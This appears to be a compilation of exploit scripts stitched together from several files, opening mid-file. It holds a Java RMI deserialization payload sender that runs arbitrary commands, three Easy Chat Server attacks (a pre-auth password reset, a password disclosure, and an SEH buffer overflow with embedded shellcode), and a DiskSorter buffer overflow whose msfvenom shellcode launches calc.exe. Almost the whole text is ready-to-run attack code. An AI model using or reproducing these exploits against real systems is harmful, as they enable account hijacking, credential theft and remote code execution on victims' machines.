a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x24\x73\x71\x00\x7e\x00\x1c\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x21\x73\x71\x00\x7e\x00\x1c\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74'
data2 += '\x00' + chr(cmdlen)
data2 += cmd
data2 += '\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x01\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x17\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x70\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7e\x00\x09\x3f\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x71\x00\x7e\x00\x3f\x78\x71\x00\x7e\x00\x3f'
return data2
def sslMode():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL")
def exploitTarget(sock):
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)
print 'sending exploit headers\n'
sock.send(getHeader())
sock.recv(8192)
print 'sending exploit\n'
sock.send(payload())
sock.close()
print 'exploit completed.'
if __name__ == "__main__":
if len(sys.argv) != 5:
print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd'
print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"'
sys.exit(0)
else:
sock = None
if sys.argv[3] == "true" or sys.argv[3] == "TRUE" or sys.argv[3] == True:
sock = sslMode()
if sys.argv[3] == "false" or sys.argv[3] == "FALSE" or sys.argv[3] == False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
exploitTarget(sock)
# Exploit Title: Easy Chat Server Remote Password Reset
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Reset
# Severity: Critical
# ====================================================================================================
# Registeration page 'register.ghp' allows resetting ANY user's password.
# Remote un-authenticated attackers can send HTTP POST requests to Hijack ANY Easy Chat Server account.
# ====================================================================================================
# USAGE: python exploit.py ip port username password
#!/usr/bin/python
import os,sys,socket
ip = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
socket.connect((ip , 80))
buffer = "POST /registresult.htm HTTP/1.1"
buffer += "Host: 192.168.1.11"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
buffer += "Accept-Language: en-US,en;q=0.5"
buffer += "Accept-Encoding: gzip, deflate"
buffer += "Connection: close"
buffer += "Content-Type: application/x-www-form-urlencoded"
buffer += "UserName=" + username + "&Password=" + password + "&Password1=ggg&Sex=0&Email=%25252540&Icon=image17.gif&Resume=aaa&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change"
socket.send(buffer)
socket.close()
print "[#] Password Changed Successfully"
# Exploit Title: Easy Chat Server Remote Password Disclosure
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Disclosure
# Severity: Critical
# =========================================================================================================
# Registeration page 'register.ghp' allows disclosing ANY user's password.
# Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password.
# =========================================================================================================
# USAGE: python exploit.py ip username
#!/usr/bin/python
import urllib
import re
import requests
import sys
ip = sys.argv[1]
username = sys.argv[2]
url = 'http://' + ip + '/register.ghp?username=' + username + '&password='
response = requests.get(url)
html = response.content
pattern = '<INPUT type="password" name="Password" maxlength="30" value="(.+?)">'
result = re.compile(pattern)
password = re.findall(result,html)
x = ''.join(password)
password = x.replace("[", "")
password = x.replace("]", "")
print "Password: " + password
# Exploit Title: Easy Chat Server User Registeration Buffer Overflow (SEH)
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Buffer Overflow
# Severity: Critical
# Tested on: [Windows XP Sp3 Eng]
# ======================================================================================================================
# Username parameter in Registeration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability.
# Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
# ======================================================================================================================
# USAGE: python exploit.py ip
#!/usr/bin/python
import os
import sys
import socket
ip = sys.argv[1]
socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
socket.connect((ip , 80))
#AlphanumericShellcode
shellcode = ("\x89\xe2\xda\xde\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x32\x55\x50\x33"
"\x30\x35\x50\x43\x50\x4d\x59\x5a\x45\x36\x51\x4f\x30\x32\x44"
"\x4c\x4b\x30\x50\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x30"
"\x52\x44\x54\x4c\x4b\x44\x32\x36\x48\x34\x4f\x58\x37\x50\x4a"
"\x31\x36\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x43\x51\x33\x4c\x43"
"\x32\x46\x4c\x51\x30\x39\x51\x48\x4f\x34\x4d\x45\x51\x48\x47"
"\x4d\x32\x4c\x32\x50\x52\x56\x37\x4c\x4b\x31\x42\x42\x30\x4c"
"\x4b\x31\x5a\x47\x4c\x4c\x4b\x30\x4c\x54\x51\x42\x58\x4a\x43"
"\x47\x38\x35\x51\x48\x51\x36\x31\x4c\x4b\x46\x39\x37\x50\x55"
"\x51\x49\x43\x4c\x4b\x50\x49\x35\x48\x4b\x53\x57\x4a\x37\x39"
"\x4c\x4b\x50\x34\x4c\x4b\x53\x31\x38\x56\x56\x51\x4b\x4f\x4e"
"\x4c\x49\x51\x38\x4f\x44\x4d\x53\x31\x39\x57\x37\x48\x4b\x50"
"\x32\x55\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d\x31"
"\x34\x43\x45\x5a\x44\x46\x38\x4c\x4b\x31\x48\x51\x34\x33\x31"
"\x58\x53\x42\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x46\x38\x35"
"\x4c\x35\x51\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4e\x30"
"\x4d\x59\x30\x44\x31\x34\x37\x54\x31\x4b\x51\x4b\x53\x51\x31"
"\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x50\x5a"
"\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x51\x4d\x55\x38\x46\x53\x36"
"\x52\x35\x50\x55\x50\x45\x38\x32\x57\x32\x53\x30\x32\x51\x4f"
"\x56\x34\x33\x58\x30\x4c\x32\x57\x56\x46\x44\x47\x4b\x4f\x58"
"\x55\x4f\x48\x4c\x50\x35\x51\x43\x30\x43\x30\x37\x59\x4f\x34"
"\x50\x54\x50\x50\x32\x48\x37\x59\x4b\x30\x32\x4b\x55\x50\x4b"
"\x4f\x59\x45\x53\x5a\x33\x38\x50\x59\x50\x50\x5a\x42\x4b\x4d"
"\x51\x50\x36\x30\x31\x50\x36\x30\x45\x38\x4b\x5a\x54\x4f\x39"
"\x4f\x4b\x50\x4b\x4f\x38\x55\x4c\x57\x52\x48\x53\x32\x45\x50"
"\x44\x51\x31\x4c\x4b\x39\x4b\x56\x52\x4a\x52\x30\x50\x56\x56"
"\x37\x33\x58\x58\x42\x39\x4b\x46\x57\x55\x37\x4b\x4f\x39\x45"
"\x51\x47\x43\x58\x4f\x47\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x59"
"\x45\x51\x47\x42\x48\x54\x34\x5a\x4c\x57\x4b\x4b\x51\x4b\x4f"
"\x48\x55\x30\x57\x5a\x37\x42\x48\x32\x55\x52\x4e\x30\x4d\x45"
"\x31\x4b\x4f\x38\x55\x35\x38\x35\x33\x52\x4d\x45\x34\x45\x50"
"\x4b\x39\x4d\x33\x56\x37\x31\x47\x56\x37\x46\x51\x5a\x56\x32"
"\x4a\x44\x52\x56\x39\x31\x46\x5a\x42\x4b\x4d\x53\x56\x39\x57"
"\x30\x44\x51\x34\x57\x4c\x35\x51\x33\x31\x4c\x4d\x37\x34\x57"
"\x54\x32\x30\x58\x46\x35\x50\x51\x54\x50\x54\x30\x50\x31\x46"
"\x51\x46\x36\x36\x31\x56\x36\x36\x30\x4e\x36\x36\x51\x46\x31"
"\x43\x46\x36\x43\x58\x33\x49\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
"\x58\x55\x4c\x49\x4d\x30\x30\x4e\x36\x36\x47\x36\x4b\x4f\x56"
"\x50\x32\x48\x33\x38\x4c\x47\x35\x4d\x35\x30\x4b\x4f\x49\x45"
"\x4f\x4b\x4a\x50\x48\x35\x59\x32\x50\x56\x52\x48\x4f\x56\x5a"
"\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58\x55\x37\x4c\x53\x36\x33\x4c"
"\x44\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x37"
"\x37\x34\x53\x52\x52\x32\x4f\x53\x5a\x35\x50\x36\x33\x4b\x4f"
"\x4e\x35\x41\x41")
magic = "B" * 217
magic += "\xeb\x06\x90\x90"
magic += "\xBC\x04\x01\x10"
magic += shellcode
magic += "C" * 200
buffer = "POST /registresult.htm HTTP/1.1\r\n\r\n"
buffer += "Host: 192.168.1.11"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
buffer += "Accept-Language: en-US,en;q=0.5"
buffer += "Accept-Encoding: gzip, deflate"
buffer += "Referer: http://192.168.1.11/register.ghp"
buffer += "Connection: close"
buffer += "Content-Type: application/x-www-form-urlencoded"
buffer += "UserName=" + magic +"&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
socket.send(buffer)
data = socket.recv(4096)
print data
socket.close()
#!/usr/bin/python
###############################################################################
# Exploit Title: DiskSorter v9.7.14 - Local Buffer Overflow
# Date: 10-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: DiskSorter v9.7.14
# Vendor Homepage: http://www.disksorter.com/
# Version: 9.7.14
# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
# Tested On: Windows XP SP3
#
# To trigger the exploit, paste the content of exploit.txt into "Add Input Directory" text box
#
# Credit to n3ckD_ for discovering the DoS exploit
#
# Challenges to convert this DoS to code execution:
# 1. Program doesn't accept non ASCII characters (0x01 to 0xff are okay-ish)
# 2. Buffer at ESP splits string if it contains a "\", this is bad since POP ESP is 0x5c
# 3. Had to write custom shellcode to get the exact location of alphanumeric shellcode in memory
#
# +----------------------------------+
# |1 custom shellcode == 1 dead llama|
# +----------------------------------+
#
##############################################################################
a = open("exploit.txt", "w")
# Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
badchars = "\x0a\x0d\x2f"
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad!
llamaleftovers = (
"\x55" # push EBP
"\x58" # pop EAX
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBP + 209
"\x40" # inc EAX, shellcode generated should start exactly here (EBP + 210) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)
junk = "\x55" + + "\x53\x5b" * 105
data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf
a.write(data)
a.close()